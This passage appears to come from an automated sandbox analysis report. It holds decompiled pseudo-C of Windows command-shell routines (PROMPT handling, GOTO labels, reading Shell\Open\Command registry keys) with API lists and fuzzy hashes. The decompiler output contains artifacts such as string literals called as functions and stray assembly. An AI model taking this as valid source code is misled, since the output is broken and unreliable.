                                                      											 *(_t155 - 0x278) =  *(_t155 - 0x278) + 2;
                                                      											_t132 =  *(_t155 - 0x278);
                                                      											continue;
                                                      										}
                                                      										_t105 = E4A74EAC4( *_t132 & 0x0000ffff);
                                                      										__eflags = _t105;
                                                      										if(_t105 == 0) {
                                                      											goto L38;
                                                      										}
                                                      										 *(_t155 - 0x280) =  *_t132 & 0x0000ffff;
                                                      										goto L29;
                                                      									}
                                                      									 *(_t155 - 0x278) = _t132 + 2;
                                                      									_t132 = 0;
                                                      									_t164 =  *0x4a754dc0 - _t132; // 0x50
                                                      									if(_t164 == 0) {
                                                      										L22:
                                                      										_t108 = _t132 * 6;
                                                      										if( *((short*)(0x4a754dc0 + _t108)) == 0) {
                                                      											break;
                                                      										}
                                                      										_t14 = _t108 + 0x4a754dc2; // 0x45000000
                                                      										_t140 =  *_t14 & 0x0000ffff;
                                                      										if(_t140 != 8) {
                                                      											_t110 = (_t140 & 0x0000ffff) - 1;
                                                      											__eflags = _t110 - 9;
                                                      											if(_t110 > 9) {
                                                      												L75:
                                                      												E4A73179D(_t152,  *((intOrPtr*)(_t155 - 0x270)), 0x4a7545b8,  *0x4a755260 & 0x0000ffff);
                                                      												_t156 = _t156 + 0x10;
                                                      												_t113 = _t152;
                                                      												_t77 = _t113 + 2; // 0x4a755e42
                                                      												_t141 = _t77;
                                                      												while(1) {
                                                      													_t147 =  *_t113;
                                                      													_t113 = _t113 + 2;
                                                      													__eflags = _t147;
                                                      													if(_t147 == 0) {
                                                      														break;
                                                      													}
                                                      												}
                                                      												L26:
                                                      												_t115 = _t113 - _t141;
                                                      												L27:
                                                      												_t116 = _t115 >> 1;
                                                      												L28:
                                                      												_t152 = _t152 + _t116 * 2;
                                                      												 *((intOrPtr*)(_t155 - 0x270)) =  *((intOrPtr*)(_t155 - 0x270)) - _t116;
                                                      												 *((intOrPtr*)(_t155 - 0x274)) = _t152;
                                                      												goto L29;
                                                      											}
                                                      											switch( *((intOrPtr*)(_t110 * 4 +  &M4A73CAEA))) {
                                                      												case 0:
                                                      													__eax = E4A73D701(__esi, 0, 1, __esi,  *(__ebp - 0x270));
                                                      													goto L28;
                                                      												case 1:
                                                      													__eax = E4A74270D(0, 1, __esi,  *(__ebp - 0x270));
                                                      													goto L28;
                                                      												case 2:
                                                      													E4A73179D(_t152,  *((intOrPtr*)(_t155 - 0x270)), E4A732CB4, 0x4a755260);
                                                      													_t156 = _t156 + 0x10;
                                                      													_t118 = _t152;
                                                      													_t5 = _t118 + 2; // 0x4a755e42
                                                      													_t141 = _t5;
                                                      													do {
                                                      														_t148 =  *_t118;
                                                      														_t118 = _t118 + 2;
                                                      														__eflags = _t148;
                                                      													} while (_t148 != 0);
                                                      													goto L26;
                                                      												case 3:
                                                      													__ebp - 0x64 = E4A73D3B3(__ebp - 0x64, 0x20);
                                                      													__eax = __ebp - 0x64;
                                                      													__edi = E4A73C56B(__ecx, 0x2350, __ebp - 0x64);
                                                      													E4A73179D(__esi,  *(__ebp - 0x270), E4A732CB4, __edi) = LocalFree(__edi);
                                                      													__eax = __esi;
                                                      													_t41 =  &(__eax[1]); // 0x4a755e42
                                                      													__ecx = _t41;
                                                      													while(1) {
                                                      														__dx =  *__eax;
                                                      														__eax =  &(__eax[0]);
                                                      														__eax =  &(__eax[0]);
                                                      														__eflags = __dx;
                                                      														if(__dx == 0) {
                                                      															goto L26;
                                                      														}
                                                      													}
                                                      													goto L26;
                                                      												case 4:
                                                      													__eflags =  *((short*)(__ebp - 0x280));
                                                      													if( *((short*)(__ebp - 0x280)) == 0) {
                                                      														_push(0x4a770758);
                                                      													} else {
                                                      														_push(0x4a770760);
                                                      													}
                                                      													_push( *(__ebp - 0x270));
                                                      													_push(__esi);
                                                      													__eax = E4A73185A();
                                                      													__eax = __esi;
                                                      													_t44 =  &(__eax[1]); // 0x4a755e42
                                                      													__edx = _t44;
                                                      													do {
                                                      														__cx =  *__eax;
                                                      														__eax =  &(__eax[0]);
                                                      														__eax =  &(__eax[0]);
                                                      														__eflags = __cx;
                                                      													} while (__cx != 0);
                                                      													__eax = __eax - __edx;
                                                      													goto L27;
                                                      												case 5:
                                                      													__eax = E4A73185A(__esi,  *(__ebp - 0x270), 0x4a7545a8);
                                                      													__eax = __esi;
                                                      													_t46 =  &(__eax[1]); // 0x4a755e42
                                                      													__ecx = _t46;
                                                      													while(1) {
                                                      														__dx =  *__eax;
                                                      														__eax =  &(__eax[0]);
                                                      														__eax =  &(__eax[0]);
                                                      														__eflags = __dx;
                                                      														if(__dx == 0) {
                                                      															goto L26;
                                                      														}
                                                      													}
                                                      													goto L26;
                                                      												case 6:
                                                      													goto L75;
                                                      												case 7:
                                                      													__eflags =  *0x4a754081;
                                                      													if( *0x4a754081 == 0) {
                                                      														goto L29;
                                                      													}
                                                      													__eax = L4A74F169();
                                                      													__al = __al - 0x28;
                                                      													 *__eax = __eax +  *__eax;
                                                      													while(1) {
                                                      														__eflags =  *(__ebp - 0x270) - 1;
                                                      														if( *(__ebp - 0x270) <= 1) {
                                                      															goto L29;
                                                      														}
                                                      														__ecx = __eax;
                                                      														__eax = __eax - 1;
                                                      														__eflags = __ecx;
                                                      														if(__ecx == 0) {
                                                      															goto L29;
                                                      														}
                                                      														_push(0x2b);
                                                      														_pop(__ecx);
                                                      														 *__esi = __cx;
                                                      														__esi =  &(__esi[0]);
                                                      														__esi =  &(__esi[0]);
                                                      														 *(__ebp - 0x274) = __esi;
                                                      														_t48 = __ebp - 0x270;
                                                      														 *_t48 =  *(__ebp - 0x270) - 1;
                                                      														__eflags =  *_t48;
                                                      													}
                                                      													goto L29;
                                                      												case 8:
                                                      													__eflags =  *0x4a754081;
                                                      													if( *0x4a754081 == 0) {
                                                      														goto L29;
                                                      													}
                                                      													__ax =  *0x4a755260;
                                                      													 *(__ebp - 0x24) =  *0x4a755260;
                                                      													__ax =  *0x4a755262;
                                                      													 *((short*)(__ebp - 0x22)) = __ax;
                                                      													_push(0x5c);
                                                      													_pop(__eax);
                                                      													 *((short*)(__ebp - 0x20)) = __ax;
                                                      													__eax = 0;
                                                      													 *((short*)(__ebp - 0x1e)) = __ax;
                                                      													__eax = __ebp - 0x24;
                                                      													__eax = GetDriveTypeW(__ebp - 0x24);
                                                      													__eflags = __eax - 4;
                                                      													if(__eax != 4) {
                                                      														goto L29;
                                                      													}
                                                      													__eax = 0;
                                                      													 *((short*)(__ebp - 0x20)) = __ax;
                                                      													 *(__ebp - 0x284) = 0x104;
                                                      													 *(__ebp - 4) =  *(__ebp - 4) & 0;
                                                      													__eax = __ebp - 0x284;
                                                      													_push(__ebp - 0x284);
                                                      													__eax = __ebp - 0x26c;
                                                      													_push(__ebp - 0x26c);
                                                      													__eax = __ebp - 0x24;
                                                      													_push(__eax);
                                                      													L4A7524C5();
                                                      													 *(__ebp - 0x27c) = __eax;
                                                      													 *(__ebp - 4) = 0xfffffffe;
                                                      													asm("daa");
                                                      													__eflags =  *(__ebp - 0x27c);
                                                      													__ebp = 0xfffffd84;
                                                      													_t66 = __ecx + __edi - 0x7f;
                                                      													 *_t66 =  *(__ecx + __edi - 0x7f) + __dh;
                                                      													__eflags =  *_t66;
                                                      											}
                                                      										}
                                                      										_t15 = _t108 + 0x4a754dc4; // 0x8004500
                                                      										E4A73179D(_t152,  *((intOrPtr*)(_t155 - 0x270)), 0x4a7545b8,  *_t15 & 0x0000ffff);
                                                      										_t156 = _t156 + 0x10;
                                                      										_t122 = _t152;
                                                      										_t17 = _t122 + 2; // 0x4a755e42
                                                      										_t141 = _t17;
                                                      										do {
                                                      											_t149 =  *_t122;
                                                      											_t122 = _t122 + 2;
                                                      										} while (_t149 != 0);
                                                      										goto L26;
                                                      									}
                                                      									_t151 = 0x4a754dc0;
                                                      									while(towupper( *( *(_t155 - 0x278)) & 0x0000ffff) !=  *_t151) {
                                                      										_t132 = _t132 + 1;
                                                      										_t12 = 0x4a754dc0 + _t132 * 6; // 0x4a754dc1
                                                      										_t151 = _t12;
                                                      										if( *_t151 != 0) {
                                                      											continue;
                                                      										}
                                                      										goto L22;
                                                      									}
                                                      									goto L22;
                                                      								}
                                                      								L30:
                                                      								 *_t152 = 0;
                                                      								_t94 = E4A73C5A0(0x4a755e40);
                                                      								__eflags =  *0x4a7541b4;
                                                      								if( *0x4a7541b4 != 0) {
                                                      									E4A731E6C(_t94);
                                                      								}
                                                      								goto L31;
                                                      							}
                                                      						}
                                                      						E4A73185A(0x4a755480, 0x200, _t132);
                                                      						_t132 = 0x4a755480;
                                                      						 *0x4a754085 = 1;
                                                      						L13:
                                                      						 *(_t155 - 0x278) = _t132;
                                                      						goto L14;
                                                      					}
                                                      				}
                                                      				L1:
                                                      				_t132 = 0x4a755480;
                                                      				goto L13;
                                                      			}
































                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: towupper
                                                      • String ID: %s>$PROMPT
                                                      • API String ID: 2392615415-196086063
                                                      • Opcode ID: 98765e0d391a2eecd7f3ff5fcaa2fb4c767da061ab0004e95dd5d8be5ad99779
                                                      • Instruction ID: 509a0fe0f89dcb60a7e8541f49a36426d67c59f4732401cb0b17a32c0149fb19
                                                      • Opcode Fuzzy Hash: 98765e0d391a2eecd7f3ff5fcaa2fb4c767da061ab0004e95dd5d8be5ad99779
                                                      • Instruction Fuzzy Hash: 0D91237194CA22EADB719B64CC88AF63F79EB51301F030195E949DF443EB718A5DCB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E4A74D88B(void* _a4, short* _a8) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				signed int _v532;
                                                      				void* _v536;
                                                      				intOrPtr* _v540;
                                                      				void* _v548;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t48;
                                                      				short* _t50;
                                                      				signed int _t54;
                                                      				signed int _t56;
                                                      				signed int _t57;
                                                      				signed int _t59;
                                                      				char* _t61;
                                                      				signed int _t64;
                                                      				signed int _t74;
                                                      				signed int _t79;
                                                      				signed int _t86;
                                                      				signed int _t87;
                                                      				intOrPtr* _t88;
                                                      				char* _t92;
                                                      				signed int _t95;
                                                      				intOrPtr* _t100;
                                                      				signed int _t107;
                                                      				void* _t108;
                                                      				void* _t111;
                                                      				char* _t112;
                                                      				intOrPtr _t114;
                                                      				char* _t115;
                                                      				intOrPtr _t117;
                                                      				signed int _t118;
                                                      				void* _t119;
                                                      				void* _t120;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				signed int _t125;
                                                      				void* _t126;
                                                      
                                                      				_t48 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t48 ^ _t125;
                                                      				_t50 = _a8;
                                                      				_t108 = _a4;
                                                      				_t121 = 0;
                                                      				_v536 = _t108;
                                                      				if(_t50 != 0) {
                                                      					__eflags =  *_t50 - 0x2e;
                                                      					if( *_t50 != 0x2e) {
                                                      						_t107 = E4A7319D6(E4A732B0D(_t50, 0));
                                                      						_v532 = _t107;
                                                      						__eflags = _t107;
                                                      						if(_t107 == 0) {
                                                      							L19:
                                                      							_t54 = 1;
                                                      							L42:
                                                      							return E4A7313A9(_t54, _t107, _v8 ^ _t125, _t118, _t121, _t122);
                                                      						}
                                                      						_t56 = E4A732148(_t107, 0x20);
                                                      						__eflags = _t56;
                                                      						if(_t56 != 0) {
                                                      							__eflags = 0;
                                                      							 *_t56 = 0;
                                                      						}
                                                      						_t57 = _t107;
                                                      						_t30 = _t57 + 2; // 0x2
                                                      						_t119 = _t30;
                                                      						do {
                                                      							_t111 =  *_t57;
                                                      							_t57 = _t57 + 2;
                                                      							__eflags = _t111 - _t121;
                                                      						} while (_t111 != _t121);
                                                      						_t59 = _t57 - _t119;
                                                      						__eflags = _t59;
                                                      						_t121 = L"\\Shell\\Open\\Command";
                                                      						_t118 = _t59 >> 1;
                                                      						_t61 = L"\\Shell\\Open\\Command";
                                                      						_t112 =  &(_t61[2]);
                                                      						do {
                                                      							_t123 =  *_t61;
                                                      							_t61 =  &(_t61[2]);
                                                      							__eflags = _t123;
                                                      						} while (_t123 != 0);
                                                      						_t64 = _t61 - _t112 >> 1;
                                                      						_push(_t107);
                                                      						__eflags = _t64 + _t118 + 1 - 0x104;
                                                      						if(_t64 + _t118 + 1 <= 0x104) {
                                                      							_push(0x104);
                                                      							_push( &_v528);
                                                      							E4A73185A();
                                                      							E4A7320A9(0x104,  &_v528, 0x104, L"\\Shell\\Open\\Command");
                                                      							_t107 = RegOpenKeyExW(_v536,  &_v528, 0, 0x2000000,  &_v548);
                                                      							__eflags = _t107;
                                                      							if(__eflags == 0) {
                                                      								_push( &_v528);
                                                      								_push(_v536);
                                                      								_t74 = E4A74D003(_t107, _t121, 0x104, __eflags);
                                                      								_t122 = _t74;
                                                      								__eflags = _t122;
                                                      								if(_t122 == 0) {
                                                      									L39:
                                                      									E4A736D44(_t112, 0x400023a5, 1, _v532);
                                                      									L40:
                                                      									E4A73142E(_t122);
                                                      									E4A73142E(_v532);
                                                      									L41:
                                                      									_t54 = _t107;
                                                      									goto L42;
                                                      								}
                                                      								_t43 = _t74 + 2; // 0x2
                                                      								_t118 = _t43;
                                                      								do {
                                                      									_t112 =  *_t74;
                                                      									_t74 = _t74 + 2;
                                                      									__eflags = _t112;
                                                      								} while (_t112 != 0);
                                                      								_t79 = _t74 - _t118;
                                                      								__eflags = _t79;
                                                      								if(_t79 == 0) {
                                                      									goto L39;
                                                      								}
                                                      								_push(_t122);
                                                      								E4A7358F3(L"%s=%s\r\n", _v532);
                                                      								goto L40;
                                                      							}
                                                      							E4A736D44(_t112, 0x400023a5, 1, _v532);
                                                      							_t122 = _t107;
                                                      							_t107 = _v532;
                                                      							L31:
                                                      							E4A73142E(_t107);
                                                      							_t54 = _t122;
                                                      							goto L42;
                                                      						}
                                                      						_push(1);
                                                      						_push(0x400023db);
                                                      						E4A736D44(_t112);
                                                      						_t122 = 0x7b;
                                                      						goto L31;
                                                      					}
                                                      					E4A736D44(_t108, 0x400023a5, 1, _t50);
                                                      					_t54 = 0x7b;
                                                      					goto L42;
                                                      				}
                                                      				_t122 = 0x104;
                                                      				_push(0x104);
                                                      				_t86 =  &_v528;
                                                      				_push(_t86);
                                                      				_push(0);
                                                      				_push(_t108);
                                                      				_v532 = 0;
                                                      				"J$uJT$uJ^$uJh$uJr$uJ|$uJ"();
                                                      				_t107 = _t86;
                                                      				if(_t107 != 0) {
                                                      					L17:
                                                      					if(_t107 == 0x103) {
                                                      						_t107 = 0;
                                                      					}
                                                      					goto L41;
                                                      				} else {
                                                      					_t121 = L"\\Shell\\Open\\Command";
                                                      					do {
                                                      						if(_v528 == 0x2e) {
                                                      							L15:
                                                      							if( *0x4a7541b4 != 0) {
                                                      								goto L19;
                                                      							}
                                                      							goto L16;
                                                      						}
                                                      						_t88 =  &_v528;
                                                      						_t9 = _t88 + 2; // 0x30
                                                      						_t120 = _t9;
                                                      						do {
                                                      							_t114 =  *_t88;
                                                      							_t88 = _t88 + 2;
                                                      						} while (_t114 != 0);
                                                      						_t107 = _t88 - _t120 >> 1;
                                                      						_t92 = _t121;
                                                      						_t115 =  &(_t92[2]);
                                                      						do {
                                                      							_t118 =  *_t92;
                                                      							_t92 =  &(_t92[2]);
                                                      						} while (_t118 != 0);
                                                      						_t95 = _t92 - _t115 >> 1;
                                                      						_t137 = _t95 + _t107 + 1 - _t122;
                                                      						if(_t95 + _t107 + 1 > _t122) {
                                                      							goto L15;
                                                      						}
                                                      						E4A7320A9(_t122,  &_v528, _t122, _t121);
                                                      						_push( &_v528);
                                                      						_push(_v536);
                                                      						_t100 = E4A74D003(_t107, _t121, _t122, _t137);
                                                      						_v540 = _t100;
                                                      						 *((short*)(_t125 + _t107 * 2 - 0x20c)) = 0;
                                                      						if(_t100 == 0) {
                                                      							L14:
                                                      							E4A73142E(_v540);
                                                      							goto L15;
                                                      						}
                                                      						_t20 = _t100 + 2; // 0x2
                                                      						_t118 = _t20;
                                                      						do {
                                                      							_t117 =  *_t100;
                                                      							_t100 = _t100 + 2;
                                                      						} while (_t117 != 0);
                                                      						if(_t100 != _t118) {
                                                      							_push(_v540);
                                                      							E4A7358F3(L"%s=%s\r\n",  &_v528);
                                                      							_t126 = _t126 + 0xc;
                                                      						}
                                                      						goto L14;
                                                      						L16:
                                                      						_v532 = _v532 + 1;
                                                      						_push(_t122);
                                                      						_t87 =  &_v528;
                                                      						_push(_t87);
                                                      						_push(_v532);
                                                      						_push(_v536);
                                                      						"J$uJT$uJ^$uJh$uJr$uJ|$uJ"();
                                                      						_t107 = _t87;
                                                      					} while (_t107 == 0);
                                                      					goto L17;
                                                      				}
                                                      			}


                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID: %s=%s$.$\Shell\Open\Command
                                                      • API String ID: 71445658-1459555574
                                                      • Opcode ID: 20cb15f3a10fd80cd166e46790e344b8607dffc062a4d76405f154b81c22a42f
                                                      • Instruction ID: 55cf5494cafdb07bc506aa8572413b749c877e1dbda4943ddc5468e6e73a02c9
                                                      • Opcode Fuzzy Hash: 20cb15f3a10fd80cd166e46790e344b8607dffc062a4d76405f154b81c22a42f
                                                      • Instruction Fuzzy Hash: 4871FB75A4921ABADF719B54CC8CEDA7B79EB44300F0581A4E589EB153E6708E8CCB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E4A731EC6(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				void* __ebp;
                                                      				int _t36;
                                                      				void _t37;
                                                      				signed int _t40;
                                                      				signed int _t43;
                                                      				void* _t45;
                                                      				void* _t47;
                                                      				void* _t49;
                                                      				signed int _t51;
                                                      				void* _t52;
                                                      				void* _t61;
                                                      				void* _t63;
                                                      				void* _t65;
                                                      				signed int _t66;
                                                      				signed int _t70;
                                                      				void* _t71;
                                                      				signed int _t73;
                                                      				void* _t74;
                                                      				void* _t76;
                                                      				signed int _t77;
                                                      				signed int _t85;
                                                      				void* _t89;
                                                      				signed int _t90;
                                                      				void _t97;
                                                      				void* _t98;
                                                      				signed int _t99;
                                                      				signed int _t100;
                                                      				void* _t101;
                                                      				signed int _t103;
                                                      				signed short* _t105;
                                                      
                                                      				_t74 = __ecx;
                                                      				_push(__esi);
                                                      				_t36 = E4A731896(0x4002);
                                                      				_t103 = _t36;
                                                      				_v16 = _t103;
                                                      				if(_t103 == 0) {
                                                      					_t37 = memset(0x4a76c640, _t36, 0x4006);
                                                      					 *0x4a754194 = 0x4a76c642;
                                                      					L35:
                                                      					_push(0xffffffff);
                                                      					_push(0x4a754ac0);
                                                      					L36:
                                                      					__imp__longjmp();
                                                      					L37:
                                                      					_push(_t37);
                                                      					 *0x4a76c642 = _t37;
                                                      					E4A736D44(_t74);
                                                      					_t74 = 0x233f;
                                                      					L40:
                                                      					_t37 = E4A73142E(_v16);
                                                      					goto L35;
                                                      				}
                                                      				E4A73185A(_t103, 0x2001,  *0x4a754194);
                                                      				_t40 =  *_t103 & 0x0000ffff;
                                                      				_v12 = _v12 & 0x00000000;
                                                      				_v8 = _v8 & 0x00000000;
                                                      				if(_t40 != 0) {
                                                      					_push(__ebx);
                                                      					_push(__edi);
                                                      					while(1) {
                                                      						_t89 = 2;
                                                      						_t105 = _t103 + _t89;
                                                      						if(_v8 > 0x2001) {
                                                      							break;
                                                      						}
                                                      						_t97 = 0x25;
                                                      						if(_t40 == _t97) {
                                                      							_t70 =  *0x4a7540b4; // 0x0
                                                      							__eflags = _t70;
                                                      							if(__eflags == 0) {
                                                      								_t71 = 0x4a754ac0;
                                                      								goto L15;
                                                      							} else {
                                                      								_t51 =  *_t105 & 0x0000ffff;
                                                      								__eflags = _t51 - _t97;
                                                      								if(_t51 == _t97) {
                                                      									_t52 =  *0x4a754194; // 0x0
                                                      									 *_t52 = _t97;
                                                      									 *0x4a754194 =  *0x4a754194 + _t89;
                                                      									_t103 = _t105 + _t89;
                                                      									__eflags = _t103;
                                                      									goto L31;
                                                      								} else {
                                                      									__eflags =  *0x4a754081;
                                                      									if( *0x4a754081 == 0) {
                                                      										L14:
                                                      										_t71 = 0x4a754ac0;
                                                      										_t43 = E4A735129(0x4a754ac0, _t105,  &_v12, L"0123456789", _t70 + 0x3c);
                                                      										__eflags = _t43;
                                                      										if(__eflags != 0) {
                                                      											L16:
                                                      											_t77 = _t43;
                                                      											_t13 = _t77 + 2; // 0x2
                                                      											_t98 = _t13;
                                                      											do {
                                                      												_t90 =  *_t77;
                                                      												_t77 = _t77 + 2;
                                                      												__eflags = _t90;
                                                      											} while (_t90 != 0);
                                                      											_t80 = _t77 - _t98 >> 1;
                                                      											_t99 = _t77 - _t98 >> 1;
                                                      											_v8 = _v8 + _t99;
                                                      											__eflags = _v8 - 0x2001;
                                                      											if(_v8 > 0x2001) {
                                                      												_push(0);
                                                      												E4A736D44(_t80);
                                                      												_t74 = 0x233f;
                                                      												_t37 = E4A73142E(_v16);
                                                      												_push(0xffffffff);
                                                      												_push(_t71);
                                                      												goto L36;
                                                      											}
                                                      											_t47 =  *0x4a754194; // 0x0
                                                      											__eflags = 0x2003;
                                                      											E4A73185A(_t47, 0x2003 - (_t47 - 0x4a76c640 >> 1), _t43);
                                                      											_t49 =  *0x4a754194; // 0x0
                                                      											 *0x4a754194 = _t49 + _t99 * 2;
                                                      											goto L20;
                                                      										} else {
                                                      											L15:
                                                      											_t43 = E4A735291(_t71, _t97, _t105, __eflags, _t71, _t105,  &_v12, _t97);
                                                      											__eflags = _t43;
                                                      											if(_t43 == 0) {
                                                      												__eflags =  *0x4a7540b4;
                                                      												if( *0x4a7540b4 != 0) {
                                                      													L20:
                                                      													_t103 =  &(_t105[_v12]);
                                                      												} else {
                                                      													_t45 =  *0x4a754194; // 0x0
                                                      													 *_t45 = _t97;
                                                      													 *0x4a754194 =  *0x4a754194 + 2;
                                                      													L31:
                                                      													_v8 = _v8 + 1;
                                                      												}
                                                      												goto L6;
                                                      											} else {
                                                      												goto L16;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										__eflags = _t51 - 0x2a;
                                                      										if(_t51 == 0x2a) {
                                                      											_t103 = _t105 + _t89;
                                                      											__eflags =  *(_t70 + 0x34);
                                                      											if( *(_t70 + 0x34) == 0) {
                                                      												_t100 = 0;
                                                      											} else {
                                                      												_t65 =  *(_t70 + 0x34);
                                                      												_t101 = _t65 + 2;
                                                      												do {
                                                      													_t85 =  *_t65;
                                                      													_t65 = _t65 + _t89;
                                                      													__eflags = _t85;
                                                      												} while (_t85 != 0);
                                                      												_t66 = _t65 - _t101;
                                                      												__eflags = _t66;
                                                      												_t100 = _t66 >> 1;
                                                      											}
                                                      											_t74 =  *(_t70 + 0x34);
                                                      											__eflags = _t100;
                                                      											if(_t100 > 0) {
                                                      												_t73 = _t100 + _v8;
                                                      												__eflags = _t73 - 0x2000;
                                                      												if(_t73 > 0x2000) {
                                                      													memcpy( *0x4a754194, _t74, 0x2000 - _v8 + 0x2000 - _v8);
                                                      													__eflags = 0;
                                                      													 *0x4a770642 = 0;
                                                      													E4A736D44(_t74, 0x234f, 1, 0x4a76c642);
                                                      													goto L40;
                                                      												}
                                                      												_t61 =  *0x4a754194; // 0x0
                                                      												E4A73185A(_t61, 0x2003 - (_t61 - 0x4a76c640 >> 1), _t74);
                                                      												_t63 =  *0x4a754194; // 0x0
                                                      												_v8 = _t73;
                                                      												 *0x4a754194 = _t63 + _t100 * 2;
                                                      											}
                                                      											goto L6;
                                                      										} else {
                                                      											goto L14;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L42:
                                                      						} else {
                                                      							_t76 =  *0x4a754194; // 0x0
                                                      							 *_t76 = _t40;
                                                      							 *0x4a754194 =  *0x4a754194 + _t89;
                                                      							_v8 = _v8 + 1;
                                                      							if(_t40 != 0xa) {
                                                      								L6:
                                                      								_t40 =  *_t103 & 0x0000ffff;
                                                      								if(_t40 != 0) {
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						break;
                                                      					}
                                                      				}
                                                      				_t74 =  *0x4a754194; // 0x0
                                                      				_t37 = 0;
                                                      				 *_t74 = 0;
                                                      				 *0x4a754194 = 0x4a76c642;
                                                      				if(_v8 > 0x2001) {
                                                      					goto L37;
                                                      				}
                                                      				return E4A73142E(_v16);
                                                      				goto L42;
                                                      			}





































                                                      APIs
                                                        • Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
                                                        • Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0
                                                      • memset.MSVCRT ref: 4A746EFD
                                                      • longjmp.MSVCRT(4A754AC0,000000FF,?,00004002,4A754210), ref: 4A746F16
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslongjmpmemset
                                                      • String ID: 0123456789
                                                      • API String ID: 2035609091-2793719750
                                                      • Opcode ID: 2391fe1d410b86184be802d694d156403c05776f69e40e0fece07119e1398f6c
                                                      • Instruction ID: 37aa5e4565e1f508c8122239e6186561059ea979916cf3e4bdfc77ab1b512688
                                                      • Opcode Fuzzy Hash: 2391fe1d410b86184be802d694d156403c05776f69e40e0fece07119e1398f6c
                                                      • Instruction Fuzzy Hash: BC615BB1A8D612EFEB708F64CD46AAA3BBAEB41350F134054EA04DB982D7305E49C714
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E4A734C09(void* _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t36;
                                                      				signed int _t42;
                                                      				void* _t46;
                                                      				int _t49;
                                                      				intOrPtr _t53;
                                                      				intOrPtr _t54;
                                                      				void* _t55;
                                                      				intOrPtr _t58;
                                                      				signed int _t66;
                                                      				intOrPtr* _t67;
                                                      				short* _t69;
                                                      				void* _t71;
                                                      				intOrPtr _t72;
                                                      				intOrPtr* _t74;
                                                      				signed int _t75;
                                                      				void* _t76;
                                                      				void* _t77;
                                                      				intOrPtr _t78;
                                                      				void* _t94;
                                                      
                                                      				_t74 = _a4;
                                                      				_v12 = 1;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t77 =  *0x4a7540b4 - _t74; // 0x0
                                                      				if(_t77 != 0) {
                                                      					L23:
                                                      					return _v8;
                                                      				} else {
                                                      					goto L1;
                                                      				}
                                                      				while(1) {
                                                      					L1:
                                                      					E4A734B2A(_t36);
                                                      					 *0x4a7540b8 = 0;
                                                      					_t78 =  *0x4a754081; // 0x0
                                                      					if(_t78 == 0 || _v12 == 0) {
                                                      						goto L3;
                                                      					}
                                                      					_t72 = _a8;
                                                      					__eflags =  *((short*)( *((intOrPtr*)(_t72 + 0x38)))) - 0x3a;
                                                      					if( *((short*)( *((intOrPtr*)(_t72 + 0x38)))) != 0x3a) {
                                                      						goto L3;
                                                      					}
                                                      					_t75 = E4A732A34();
                                                      					__eflags = _t75;
                                                      					if(_t75 == 0) {
                                                      						L42:
                                                      						return 1;
                                                      					}
                                                      					 *_t75 = 0;
                                                      					_t66 = E4A7319D6(L"GOTO");
                                                      					 *((intOrPtr*)(_t75 + 0x38)) = _t66;
                                                      					__eflags = _t66;
                                                      					if(_t66 == 0) {
                                                      						goto L42;
                                                      					}
                                                      					_t67 = E4A7319D6( *((intOrPtr*)(_t72 + 0x38)));
                                                      					 *((intOrPtr*)(_t75 + 0x3c)) = _t67;
                                                      					__eflags = _t67;
                                                      					if (_t67 == 0) goto L42;
                                                      					_pop(_t76);
                                                      					 *_t67 =  *_t67 + _t67;
                                                      					__eflags =  *_t67;
                                                      					L3:
                                                      					_t72 = E4A734D4E(_t74);
                                                      					_t80 = _t72 - 0xffffffff;
                                                      					if(_t72 == 0xffffffff) {
                                                      						goto L42;
                                                      					}
                                                      					_t42 = E4A731BD2(_t80, 3, _t72,  *((intOrPtr*)(_t74 + 0x10)));
                                                      					_t75 = _t42;
                                                      					__imp___tell(_t72);
                                                      					_t69 = _a4;
                                                      					 *((intOrPtr*)(_t69 + 8)) = _t42;
                                                      					E4A733AB3(_t72);
                                                      					if(_t75 == 0) {
                                                      						L18:
                                                      						_t36 = _a4;
                                                      						_t94 =  *0x4a7540b4 - _t36; // 0x0
                                                      						if(_t94 != 0) {
                                                      							goto L23;
                                                      						}
                                                      						_t74 = _t36;
                                                      						continue;
                                                      					}
                                                      					if(_t75 == 1 ||  *0x4a754174 == 0x234a) {
                                                      						E4A74EE72();
                                                      						__eflags =  *0x4a75408c - 1;
